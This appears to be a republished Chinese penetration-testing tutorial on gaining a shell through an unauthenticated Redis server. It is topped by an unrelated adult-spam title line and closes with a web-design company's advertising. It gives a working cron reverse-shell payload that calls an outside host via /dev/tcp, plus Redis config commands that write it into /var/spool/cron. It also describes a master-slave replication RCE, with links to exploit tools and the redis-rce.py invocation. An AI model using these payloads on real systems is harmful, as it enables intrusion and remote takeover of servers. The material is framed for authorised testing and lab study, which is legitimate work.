欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

Redis+Getshell的示例分析

小編給大家分享一下redis+Getshell的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

創(chuàng)新互聯(lián)建站長期為近千家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺,與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為蓬安企業(yè)提供專業(yè)的網(wǎng)站建設(shè)、網(wǎng)站制作,蓬安網(wǎng)站改版等技術(shù)服務(wù)。擁有10余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

前言:

當(dāng)我們接到一個授權(quán)滲透測試的時候,常規(guī)漏洞如注入、文件上傳等嘗試無果后,掃描端口可能會發(fā)現(xiàn)意外收獲。

知己知彼乃百戰(zhàn)不殆,Redis介紹:

簡單來說 redis 就是一個Key-Value類型的數(shù)據(jù)庫, redis 所有數(shù)據(jù)全部在內(nèi)存中進(jìn)行操作,并且它可以將內(nèi)存中的數(shù)據(jù)定期存儲在磁盤中,并且支持保存多種數(shù)據(jù)結(jié)構(gòu)(String、hash、list等)。

運(yùn)籌帷幄之中,Redis漏洞:

1、未授權(quán)訪問漏洞

Redis在默認(rèn)情況下,會綁定在0.0.0.0:6379,如果沒有采用限制IP訪問,就會將Redis服務(wù)暴露在公網(wǎng)上,并且在沒有設(shè)置密碼認(rèn)證的情況下,會導(dǎo)致任意用戶未授權(quán)訪問Redis以及讀取Redis數(shù)據(jù)并寫入公鑰進(jìn)行遠(yuǎn)程連接等。

當(dāng)拿到數(shù)據(jù)庫權(quán)限是不會滿足我們的,我們的目標(biāo)只有一個getshell!

目前較主流的兩個方法,第一種定時計(jì)劃反彈shell、第二種利用主從復(fù)制rce。

2、定時計(jì)劃反彈shell

1)set x "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n"

2)config set dir /var/spool/cron/

3)config set dbfilename root

4)save

3、利用主從復(fù)制rce

漏洞存在于4.x、5.x版本中,Redis提供了主從模式,主從模式指使用一個redis作為主機(jī),其他的作為備份機(jī),主機(jī)從機(jī)數(shù)據(jù)都是一樣的,從機(jī)只負(fù)責(zé)讀,主機(jī)只負(fù)責(zé)寫。在Reids 4.x之后,通過外部拓展,可以實(shí)現(xiàn)在redis中實(shí)現(xiàn)一個新的Redis命令,構(gòu)造惡意.so文件。在兩個Redis實(shí)例設(shè)置主從模式的時候,Redis的主機(jī)實(shí)例可以通過FULLRESYNC同步文件到從機(jī)上。然后在從機(jī)上加載惡意so文件,即可執(zhí)行命令。

需要利用一個工具,GitHub下載即可。

1)git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(需要make)

2)git clone https://github.com/Ridter/redis-rce.git

進(jìn)而通過未授權(quán)訪問或者弱口令連接redis,執(zhí)行腳本即可獲取shell。
Redis+Getshell的示例分析

決勝千里之外,實(shí)戰(zhàn)演練:

本次掃到了6379也就是Redis,有的時候可能或改默認(rèn)端口,建議全端口掃描,本次利用主從復(fù)制rce獲取shell(由于該漏洞已提交src,簽約保密協(xié)議,故搭建靶機(jī)還原真實(shí)環(huán)境,保證原汁原味。)

攻擊端ip:192.168.109.134

服務(wù)端ip:192.168.109.136

Redis+Getshell的示例分析通過未授權(quán)訪問連接redis(如果有密碼,可以嘗試爆破,authpassword 登陸系統(tǒng)):Redis-cli –h ip
Redis+Getshell的示例分析利用主從復(fù)制rce獲取shell

首先要生成惡意.so文件,下載RedisModules-ExecuteCommand使用make編譯即可生成。
Redis+Getshell的示例分析攻擊端執(zhí)行:

python redis-rce.py -r 目標(biāo)ip-p 目標(biāo)端口 -L 本地ip -f 惡意.so

成功獲取shell
Redis+Getshell的示例分析

以上是“Redis+Getshell的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學(xué)習(xí)更多知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!

分享名稱:Redis+Getshell的示例分析
網(wǎng)頁鏈接:http://chinadenli.net/article42/gichhc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站維護(hù)、云服務(wù)器、App開發(fā)、小程序開發(fā)、標(biāo)簽優(yōu)化、品牌網(wǎng)站設(shè)計(jì)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

手機(jī)網(wǎng)站建設(shè)